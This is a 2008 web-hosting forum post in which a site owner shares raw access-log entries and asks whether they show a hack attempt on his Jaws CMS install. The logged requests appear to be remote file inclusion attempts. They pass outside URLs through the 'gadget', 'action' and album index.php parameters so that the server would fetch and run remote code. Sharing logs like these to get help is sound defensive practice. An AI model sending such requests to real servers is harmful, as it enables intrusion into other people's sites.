Web Hosting Forum | Lunarpages
News: April 3, 2008 - New Contest! - Win 5 Years of Hosting and $1,000!
May 5, 2008 - May 08 Web Site of the Month? - Submit your LINKS!!!
 
Home Help Search Calendar Login Register
*
Welcome, Guest. Please login or register.
Did you miss your activation email? 		May 16, 2008, 10:31:06 PM


Login with username, password and session length


Web Hosting Forum | Lunarpages > Lunarpages Web Hosting - Advanced Assistance > Web Management > Hack attempt or exploit?
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Hack attempt or exploit?  (Read 526 times)
cgrobin
Trekkie
**
Online Online

Posts: 15


WWW
« on: February 25, 2008, 03:59:14 PM »
I was reviewing my logs last night, and I'm finding all kinds of bizarre entries I've never seen before.  I tried to Google parts of the entry and found references to a Joomla exploit.   

Here is a sample entry from my log:
Quote
ezechiel.sdb.cz!03/Feb!20:11:59!!200 609!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:00!leftnav.htm!200 2179!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:01!home.html!200 1826!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:02!Tagged.shtml!200 964!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:03!jaws!301 304!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:04!jaws/!200 3120!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:05!jaws/?gadget=http%3A%2F%2Fwww.feliciano.de%2FWebgalerie%2Fbilder%2FItaly%2Fune%2Fyiwul%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:06!jaws/?gadget=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:07!jaws/?gadget=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:08!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:09!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.ce-cioceoforum.com%2Ftalk%2Ft1%2Froda%2Filubov%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:10!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:11!jaws/?gadget=Phoo!200 4480!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:13!jaws/index.php/photos/album/1.html!200 5645!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:14!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:15!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fupu%2Fohoqoh%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:16!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:20!jaws/index.php/photos/album/?gadget=Phoo!200 4451!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:22!jaws/index.php/photos/album/index.php?photos/album/2.html!200 4250!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:24!jaws/index.php/photos/album/index.php?photos/album/2/photo/11.html!200 3055!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

Here are more entries from my February log, copied into a Word doc.   http://cgrobin.com/HackFeb.doc

I have Jaws running on my site, and it seems to be trying to use it to hit another server.   I don't see anything off on my account, but I don't want someone else to think I'm the one attacking there server.

Is anyone else getting this, and is there anything that can be done?   I have a small board in a subdomain and members have been commenting the site has been slow and I wonder now if the server is getting a lot of these requests.

Thanks
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.3 | SMF © 2006-2007, Simple Machines LLC
Seo4Smf v0.2 © Webmaster's Talks

Valid XHTML 1.0! Valid CSS! Dilber MC Theme by HarzeM